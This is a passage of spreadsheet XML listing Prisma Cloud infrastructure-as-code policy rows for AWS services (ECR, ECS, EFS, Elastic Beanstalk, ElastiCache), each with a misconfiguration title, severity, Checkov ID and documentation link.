    <row r="760">
      <c r="A760" t="inlineStr"/>
      <c r="B760" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C760" s="2" t="inlineStr"/>
      <c r="D760" t="inlineStr"/>
      <c r="E760" t="inlineStr"/>
      <c r="F760" t="inlineStr"/>
      <c r="G760" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J760" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecr</t>
        </is>
      </c>
      <c r="K760" t="inlineStr">
        <is>
          <t>ECR image tags are not immutable</t>
        </is>
      </c>
      <c r="L760" t="inlineStr"/>
      <c r="M760" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N760" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O760" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P760" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q760" t="inlineStr"/>
      <c r="R760" t="inlineStr"/>
      <c r="S760" t="inlineStr"/>
      <c r="T760" t="b">
        <v>0</v>
      </c>
      <c r="U760" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V760" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecr-repository</t>
        </is>
      </c>
      <c r="W760" t="inlineStr">
        <is>
          <t>Ensure ECR Image Tags are immutable</t>
        </is>
      </c>
      <c r="X760" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-24</t>
        </is>
      </c>
      <c r="Y760" t="inlineStr"/>
      <c r="Z760" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ecr_repository"]}</t>
        </is>
      </c>
      <c r="AA760" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB760" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC760" t="inlineStr">
        <is>
          <t>CKV_AWS_51</t>
        </is>
      </c>
      <c r="AD760" t="b">
        <v>1</v>
      </c>
      <c r="AE760" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF760" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>cf8ebb0f-cfed-4f57-b60c-8d4a9de1e189</t>
        </is>
      </c>
      <c r="AI760" t="inlineStr"/>
      <c r="AJ760" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK760" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" t="inlineStr"/>
      <c r="B761" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C761" s="2" t="inlineStr"/>
      <c r="D761" t="inlineStr"/>
      <c r="E761" t="inlineStr"/>
      <c r="F761" t="inlineStr"/>
      <c r="G761" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J761" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs</t>
        </is>
      </c>
      <c r="K761" t="inlineStr">
        <is>
          <t>AWS cluster logging is not enabled or client to container communication not encrypted using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L761" t="inlineStr"/>
      <c r="M761" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N761" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O761" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P761" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q761" t="inlineStr"/>
      <c r="R761" t="inlineStr"/>
      <c r="S761" t="inlineStr"/>
      <c r="T761" t="b">
        <v>0</v>
      </c>
      <c r="U761" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V761" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs-cluster</t>
        </is>
      </c>
      <c r="W761" t="inlineStr">
        <is>
          <t>Ensure Cluster logging with CMK</t>
        </is>
      </c>
      <c r="X761" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-cluster-logging-is-encrypted-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y761" t="inlineStr"/>
      <c r="Z761" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ecs_cluster"]}</t>
        </is>
      </c>
      <c r="AA761" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB761" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC761" t="inlineStr">
        <is>
          <t>CKV_AWS_224</t>
        </is>
      </c>
      <c r="AD761" t="b">
        <v>1</v>
      </c>
      <c r="AE761" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF761" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>3cd7b197-efc0-46ab-b0dd-db3bd00f56ae</t>
        </is>
      </c>
      <c r="AI761" t="inlineStr"/>
      <c r="AJ761" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK761" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" t="inlineStr"/>
      <c r="B762" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C762" s="2" t="inlineStr"/>
      <c r="D762" t="inlineStr"/>
      <c r="E762" t="inlineStr"/>
      <c r="F762" t="inlineStr"/>
      <c r="G762" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J762" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs</t>
        </is>
      </c>
      <c r="K762" t="inlineStr">
        <is>
          <t>AWS ECS Cluster does not enable logging of ECS Exec</t>
        </is>
      </c>
      <c r="L762" t="inlineStr"/>
      <c r="M762" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N762" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O762" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P762" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q762" t="inlineStr"/>
      <c r="R762" t="inlineStr"/>
      <c r="S762" t="inlineStr"/>
      <c r="T762" t="b">
        <v>0</v>
      </c>
      <c r="U762" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V762" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs-cluster</t>
        </is>
      </c>
      <c r="W762" t="inlineStr">
        <is>
          <t>Ensure ECS Cluster enables logging of ECS Exec</t>
        </is>
      </c>
      <c r="X762" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-ecs-cluster-enables-logging-of-ecs-exec</t>
        </is>
      </c>
      <c r="Y762" t="inlineStr"/>
      <c r="Z762" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ecs_cluster"]}</t>
        </is>
      </c>
      <c r="AA762" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB762" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC762" t="inlineStr">
        <is>
          <t>CKV_AWS_223</t>
        </is>
      </c>
      <c r="AD762" t="b">
        <v>1</v>
      </c>
      <c r="AE762" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF762" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>d011fa3d-3474-47df-a803-114baea19fde</t>
        </is>
      </c>
      <c r="AI762" t="inlineStr"/>
      <c r="AJ762" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK762" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" t="inlineStr"/>
      <c r="B763" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C763" s="2" t="inlineStr"/>
      <c r="D763" t="inlineStr"/>
      <c r="E763" t="inlineStr"/>
      <c r="F763" t="inlineStr"/>
      <c r="G763" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J763" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs</t>
        </is>
      </c>
      <c r="K763" t="inlineStr">
        <is>
          <t>ECS Fargate services are not ensured to run on the latest Fargate platform version</t>
        </is>
      </c>
      <c r="L763" t="inlineStr"/>
      <c r="M763" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N763" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O763" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P763" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q763" t="inlineStr"/>
      <c r="R763" t="inlineStr"/>
      <c r="S763" t="inlineStr"/>
      <c r="T763" t="b">
        <v>0</v>
      </c>
      <c r="U763" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V763" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs-service</t>
        </is>
      </c>
      <c r="W763" t="inlineStr">
        <is>
          <t>Ensure ECS Fargate services run on the latest Fargate platform version</t>
        </is>
      </c>
      <c r="X763" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-332</t>
        </is>
      </c>
      <c r="Y763" t="inlineStr"/>
      <c r="Z763" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ecs_service"]}</t>
        </is>
      </c>
      <c r="AA763" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB763" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC763" t="inlineStr">
        <is>
          <t>CKV_AWS_332</t>
        </is>
      </c>
      <c r="AD763" t="b">
        <v>1</v>
      </c>
      <c r="AE763" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF763" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>8a5d6943-f4c7-449f-b61b-8d2b0901851b</t>
        </is>
      </c>
      <c r="AI763" t="inlineStr"/>
      <c r="AJ763" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK763" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" t="inlineStr"/>
      <c r="B764" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C764" s="2" t="inlineStr"/>
      <c r="D764" t="inlineStr"/>
      <c r="E764" t="inlineStr"/>
      <c r="F764" t="inlineStr"/>
      <c r="G764" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J764" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs</t>
        </is>
      </c>
      <c r="K764" t="inlineStr">
        <is>
          <t>ECS task definitions have their own unique process namespace or share the host's process namespace</t>
        </is>
      </c>
      <c r="L764" t="inlineStr"/>
      <c r="M764" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N764" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O764" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P764" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q764" t="inlineStr"/>
      <c r="R764" t="inlineStr"/>
      <c r="S764" t="inlineStr"/>
      <c r="T764" t="b">
        <v>0</v>
      </c>
      <c r="U764" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V764" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs-task-definition</t>
        </is>
      </c>
      <c r="W764" t="inlineStr">
        <is>
          <t>Ensure ECS task definitions should not share the host's process namespace</t>
        </is>
      </c>
      <c r="X764" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-335</t>
        </is>
      </c>
      <c r="Y764" t="inlineStr"/>
      <c r="Z764" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ecs_task_definition"]}</t>
        </is>
      </c>
      <c r="AA764" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB764" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC764" t="inlineStr">
        <is>
          <t>CKV_AWS_335</t>
        </is>
      </c>
      <c r="AD764" t="b">
        <v>1</v>
      </c>
      <c r="AE764" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF764" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>aceb38e8-5863-41c9-9552-5afff4ccde08</t>
        </is>
      </c>
      <c r="AI764" t="inlineStr"/>
      <c r="AJ764" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK764" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" t="inlineStr"/>
      <c r="B765" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C765" s="2" t="inlineStr"/>
      <c r="D765" t="inlineStr"/>
      <c r="E765" t="inlineStr"/>
      <c r="F765" t="inlineStr"/>
      <c r="G765" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J765" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs</t>
        </is>
      </c>
      <c r="K765" t="inlineStr">
        <is>
          <t>EFS volumes in ECS task definitions do not have encryption in transit enabled</t>
        </is>
      </c>
      <c r="L765" t="inlineStr"/>
      <c r="M765" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N765" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O765" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P765" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q765" t="inlineStr"/>
      <c r="R765" t="inlineStr"/>
      <c r="S765" t="inlineStr"/>
      <c r="T765" t="b">
        <v>0</v>
      </c>
      <c r="U765" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V765" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecs-task-definition</t>
        </is>
      </c>
      <c r="W765" t="inlineStr">
        <is>
          <t>Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions</t>
        </is>
      </c>
      <c r="X765" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-39</t>
        </is>
      </c>
      <c r="Y765" t="inlineStr"/>
      <c r="Z765" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ecs_task_definition"]}</t>
        </is>
      </c>
      <c r="AA765" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB765" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC765" t="inlineStr">
        <is>
          <t>CKV_AWS_97</t>
        </is>
      </c>
      <c r="AD765" t="b">
        <v>1</v>
      </c>
      <c r="AE765" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF765" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>880174a9-71c2-499e-a1a1-09f88106f7dc</t>
        </is>
      </c>
      <c r="AI765" t="inlineStr"/>
      <c r="AJ765" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK765" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" t="inlineStr"/>
      <c r="B766" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C766" s="2" t="inlineStr"/>
      <c r="D766" t="inlineStr"/>
      <c r="E766" t="inlineStr"/>
      <c r="F766" t="inlineStr"/>
      <c r="G766" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J766" t="inlineStr">
        <is>
          <t>IaC:General:aws-efs</t>
        </is>
      </c>
      <c r="K766" t="inlineStr">
        <is>
          <t>User identity should be enforced by EFS access points</t>
        </is>
      </c>
      <c r="L766" t="inlineStr"/>
      <c r="M766" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N766" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O766" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P766" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q766" t="inlineStr"/>
      <c r="R766" t="inlineStr"/>
      <c r="S766" t="inlineStr"/>
      <c r="T766" t="b">
        <v>0</v>
      </c>
      <c r="U766" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V766" t="inlineStr">
        <is>
          <t>IaC:General:aws-efs-access-point</t>
        </is>
      </c>
      <c r="W766" t="inlineStr">
        <is>
          <t>EFS access points should enforce a user identity</t>
        </is>
      </c>
      <c r="X766" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-330</t>
        </is>
      </c>
      <c r="Y766" t="inlineStr"/>
      <c r="Z766" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_efs_access_point"]}</t>
        </is>
      </c>
      <c r="AA766" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB766" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC766" t="inlineStr">
        <is>
          <t>CKV_AWS_330</t>
        </is>
      </c>
      <c r="AD766" t="b">
        <v>1</v>
      </c>
      <c r="AE766" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF766" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>4eb48cce-fb8c-4dc1-9edc-a6389ad271a6</t>
        </is>
      </c>
      <c r="AI766" t="inlineStr"/>
      <c r="AJ766" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK766" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" t="inlineStr"/>
      <c r="B767" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C767" s="2" t="inlineStr"/>
      <c r="D767" t="inlineStr"/>
      <c r="E767" t="inlineStr"/>
      <c r="F767" t="inlineStr"/>
      <c r="G767" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J767" t="inlineStr">
        <is>
          <t>IaC:General:aws-efs</t>
        </is>
      </c>
      <c r="K767" t="inlineStr">
        <is>
          <t>EFS Access Points are not enforcing a root directory</t>
        </is>
      </c>
      <c r="L767" t="inlineStr"/>
      <c r="M767" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N767" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O767" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P767" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q767" t="inlineStr"/>
      <c r="R767" t="inlineStr"/>
      <c r="S767" t="inlineStr"/>
      <c r="T767" t="b">
        <v>0</v>
      </c>
      <c r="U767" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V767" t="inlineStr">
        <is>
          <t>IaC:General:aws-efs-access-point</t>
        </is>
      </c>
      <c r="W767" t="inlineStr">
        <is>
          <t>EFS access points should enforce a root directory</t>
        </is>
      </c>
      <c r="X767" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-329</t>
        </is>
      </c>
      <c r="Y767" t="inlineStr"/>
      <c r="Z767" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_efs_access_point"]}</t>
        </is>
      </c>
      <c r="AA767" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB767" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC767" t="inlineStr">
        <is>
          <t>CKV_AWS_329</t>
        </is>
      </c>
      <c r="AD767" t="b">
        <v>1</v>
      </c>
      <c r="AE767" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF767" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>131ed876-a8e2-4140-8da0-195e065a529e</t>
        </is>
      </c>
      <c r="AI767" t="inlineStr"/>
      <c r="AJ767" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK767" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" t="inlineStr"/>
      <c r="B768" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C768" s="2" t="inlineStr"/>
      <c r="D768" t="inlineStr"/>
      <c r="E768" t="inlineStr"/>
      <c r="F768" t="inlineStr"/>
      <c r="G768" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J768" t="inlineStr">
        <is>
          <t>IaC:General:aws-efs</t>
        </is>
      </c>
      <c r="K768" t="inlineStr">
        <is>
          <t>AWS Elastic File System (EFS) is not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L768" t="inlineStr"/>
      <c r="M768" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N768" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O768" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P768" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q768" t="inlineStr"/>
      <c r="R768" t="inlineStr"/>
      <c r="S768" t="inlineStr"/>
      <c r="T768" t="b">
        <v>0</v>
      </c>
      <c r="U768" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V768" t="inlineStr">
        <is>
          <t>IaC:General:aws-efs-file-system</t>
        </is>
      </c>
      <c r="W768" t="inlineStr">
        <is>
          <t>Ensure Elastic File System (EFS) is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X768" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-104</t>
        </is>
      </c>
      <c r="Y768" t="inlineStr"/>
      <c r="Z768" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_efs_file_system"]}</t>
        </is>
      </c>
      <c r="AA768" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB768" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC768" t="inlineStr">
        <is>
          <t>CKV_AWS_184</t>
        </is>
      </c>
      <c r="AD768" t="b">
        <v>1</v>
      </c>
      <c r="AE768" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF768" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>e6c0b945-77de-490c-adb8-d085a445550d</t>
        </is>
      </c>
      <c r="AI768" t="inlineStr"/>
      <c r="AJ768" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK768" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" t="inlineStr"/>
      <c r="B769" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C769" s="2" t="inlineStr"/>
      <c r="D769" t="inlineStr"/>
      <c r="E769" t="inlineStr"/>
      <c r="F769" t="inlineStr"/>
      <c r="G769" t="b">
        <v>1</v>
      </c>
      <c r="H7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69" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J769" t="inlineStr">
        <is>
          <t>IaC:General:aws-elastic</t>
        </is>
      </c>
      <c r="K769" t="inlineStr">
        <is>
          <t>Elastic Beanstalk environments do not have enhanced health reporting enabled</t>
        </is>
      </c>
      <c r="L769" t="inlineStr"/>
      <c r="M769" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N769" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O769" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P769" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q769" t="inlineStr"/>
      <c r="R769" t="inlineStr"/>
      <c r="S769" t="inlineStr"/>
      <c r="T769" t="b">
        <v>0</v>
      </c>
      <c r="U769" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V769" t="inlineStr">
        <is>
          <t>IaC:General:aws-elastic-beanstalk-environment</t>
        </is>
      </c>
      <c r="W769" t="inlineStr">
        <is>
          <t>Ensure Elastic Beanstalk environments have enhanced health reporting enabled</t>
        </is>
      </c>
      <c r="X769" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-312</t>
        </is>
      </c>
      <c r="Y769" t="inlineStr"/>
      <c r="Z769" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_elastic_beanstalk_environment"]}</t>
        </is>
      </c>
      <c r="AA769" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB769" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC769" t="inlineStr">
        <is>
          <t>CKV_AWS_312</t>
        </is>
      </c>
      <c r="AD769" t="b">
        <v>1</v>
      </c>
      <c r="AE769" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF769" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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69" t="inlineStr">
        <is>
          <t>1d31797a-8a1e-44f0-99c6-fd313aeb293f</t>
        </is>
      </c>
      <c r="AI769" t="inlineStr"/>
      <c r="AJ769" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK769" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" t="inlineStr"/>
      <c r="B770" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C770" s="2" t="inlineStr"/>
      <c r="D770" t="inlineStr"/>
      <c r="E770" t="inlineStr"/>
      <c r="F770" t="inlineStr"/>
      <c r="G770" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J770" t="inlineStr">
        <is>
          <t>IaC:General:aws-elasticache</t>
        </is>
      </c>
      <c r="K770" t="inlineStr">
        <is>
          <t>AWS Elasticache replication group not configured with CMK key</t>
        </is>
      </c>
      <c r="L770" t="inlineStr"/>
      <c r="M770" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N770" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O770" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P770" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q770" t="inlineStr"/>
      <c r="R770" t="inlineStr"/>
      <c r="S770" t="inlineStr"/>
      <c r="T770" t="b">
        <v>0</v>
      </c>
